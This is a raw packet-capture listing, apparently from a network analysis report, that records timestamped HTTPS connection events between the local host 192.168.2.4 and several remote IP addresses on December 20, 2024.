                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.927066088 CET49906443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.927711010 CET49906443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.927736044 CET44349906141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.935213089 CET44349899141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.935434103 CET49899443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.935444117 CET44349899141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.936568975 CET44349899141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.936881065 CET49899443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.936975956 CET49899443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.936981916 CET44349899141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.937048912 CET44349899141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.943461895 CET49897443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.943480015 CET44349897141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.947022915 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.947204113 CET49900443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.947266102 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.950797081 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.950872898 CET49900443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.951117992 CET49900443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.951204062 CET49900443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.951215982 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.951293945 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.958631992 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.958656073 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.990057945 CET49899443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:03.990061998 CET49897443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.006171942 CET49900443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.006177902 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.006191015 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.020992994 CET44349901141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.021800995 CET49901443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.021858931 CET44349901141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.023000002 CET44349901141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.026218891 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.027363062 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.027405024 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.027894020 CET49901443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.027998924 CET44349901141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.028028965 CET49901443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.030946016 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.031030893 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.031311035 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.031449080 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.031461954 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.031501055 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.058821917 CET49900443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.064270020 CET44349903141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.064516068 CET49903443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.064549923 CET44349903141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.066448927 CET44349903141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.066518068 CET49903443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.066826105 CET49903443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.066906929 CET44349903141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.066946030 CET49903443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.074044943 CET49901443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.074054003 CET44349901141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.074054956 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.074078083 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.107382059 CET44349903141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.120949030 CET49903443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.120959997 CET44349903141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.120970011 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.155751944 CET44349895141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.155868053 CET44349895141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.156080961 CET44349895141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.156270981 CET49895443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.156460047 CET49895443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.156497955 CET44349895141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.156908035 CET49907443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.157000065 CET44349907141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.158893108 CET49907443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.159416914 CET49908443192.168.2.4104.26.3.122
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.159460068 CET44349908104.26.3.122192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.160002947 CET49908443192.168.2.4104.26.3.122
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.160501003 CET49907443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.160538912 CET44349907141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.160758018 CET49908443192.168.2.4104.26.3.122
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.160785913 CET44349908104.26.3.122192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.167347908 CET49903443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.172246933 CET44349896141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.172389030 CET44349896141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.172471046 CET44349896141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.172540903 CET49896443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.172564983 CET44349896141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.172804117 CET44349896141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.172858953 CET49896443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.173357964 CET49896443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.173378944 CET44349896141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.173633099 CET49909443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.173702955 CET44349909141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.173774958 CET49909443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.174243927 CET49909443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.174277067 CET44349909141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.213617086 CET49892443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.213629007 CET44349892141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.338151932 CET49910443192.168.2.4104.26.8.127
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.338255882 CET44349910104.26.8.127192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.338387966 CET49910443192.168.2.4104.26.8.127
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.338577986 CET49910443192.168.2.4104.26.8.127
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.338606119 CET44349910104.26.8.127192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.345700026 CET44349897141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.345938921 CET44349897141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.346009016 CET49897443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.346395016 CET49897443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.346427917 CET44349897141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.346745968 CET49911443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.346801996 CET44349911141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.346870899 CET49911443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.347490072 CET49911443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.347517967 CET44349911141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.360258102 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.360383034 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.360451937 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.360476017 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.360569000 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.360649109 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.360652924 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.360681057 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.360897064 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.360912085 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.369366884 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.369448900 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.369462967 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.387447119 CET44349899141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.387598038 CET44349899141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.387744904 CET49899443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.388653994 CET49899443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.388696909 CET44349899141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.389023066 CET49912443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.389090061 CET44349912141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.389169931 CET49912443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.389508009 CET49912443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.389538050 CET44349912141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.396497011 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.396641970 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.396729946 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.396774054 CET49900443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.396800041 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.396853924 CET49900443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.396869898 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.396948099 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.397063971 CET49900443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.397707939 CET49900443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.397727013 CET44349900141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.397947073 CET49913443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.398005009 CET44349913141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.398070097 CET49913443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.398521900 CET49913443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.398550034 CET44349913141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.412820101 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.413319111 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.413378954 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.413391113 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.413499117 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.413577080 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.413584948 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.418585062 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.418603897 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.425896883 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.425960064 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.425966978 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.435579062 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.435631990 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.435640097 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.465826035 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.471776962 CET44349901141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.472028971 CET44349901141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.472089052 CET49901443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.472371101 CET49901443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.472409964 CET44349901141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.472624063 CET49914443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.472691059 CET44349914141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.472858906 CET49914443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.473223925 CET49914443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.473258018 CET44349914141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.480994940 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.481002092 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.481070042 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.485591888 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.485743046 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.485801935 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.485825062 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.485914946 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.485966921 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.485980034 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.486087084 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.486131907 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.486143112 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.494340897 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.494400978 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.494415045 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.510411978 CET44349903141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.510533094 CET44349903141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.510596037 CET49903443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.510627031 CET44349903141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.510766029 CET44349903141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.510823011 CET49903443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.511127949 CET49903443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.511141062 CET44349903141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.511379004 CET49915443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.511432886 CET44349915141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.511503935 CET49915443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.511699915 CET49915443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.511732101 CET44349915141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.528156996 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.528175116 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.528219938 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.533034086 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.537756920 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.537810087 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.537828922 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.543392897 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.543411970 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.556180954 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.556245089 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.556262970 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.563700914 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.563761950 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.563776970 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.563960075 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.564018011 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.564088106 CET49898443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.564110994 CET44349898141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.564438105 CET49916443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.564481020 CET44349916141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.564543009 CET49916443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.564955950 CET49916443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.564975977 CET44349916141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.584139109 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.584146976 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.603993893 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.605009079 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.608916998 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.608968019 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.608975887 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.609227896 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.609287024 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.609620094 CET49902443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.609639883 CET44349902141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.609898090 CET49917443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.609936953 CET44349917141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.609989882 CET49917443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.610398054 CET49917443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.610414982 CET44349917141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.616203070 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.616254091 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.616262913 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.623409033 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.623460054 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.623466969 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.630548000 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.630597115 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.630604029 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.645756006 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.645808935 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.645818949 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.652386904 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.652440071 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.652446985 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.659303904 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.659357071 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.659373045 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.666507959 CET44349894199.232.168.157192.168.2.4
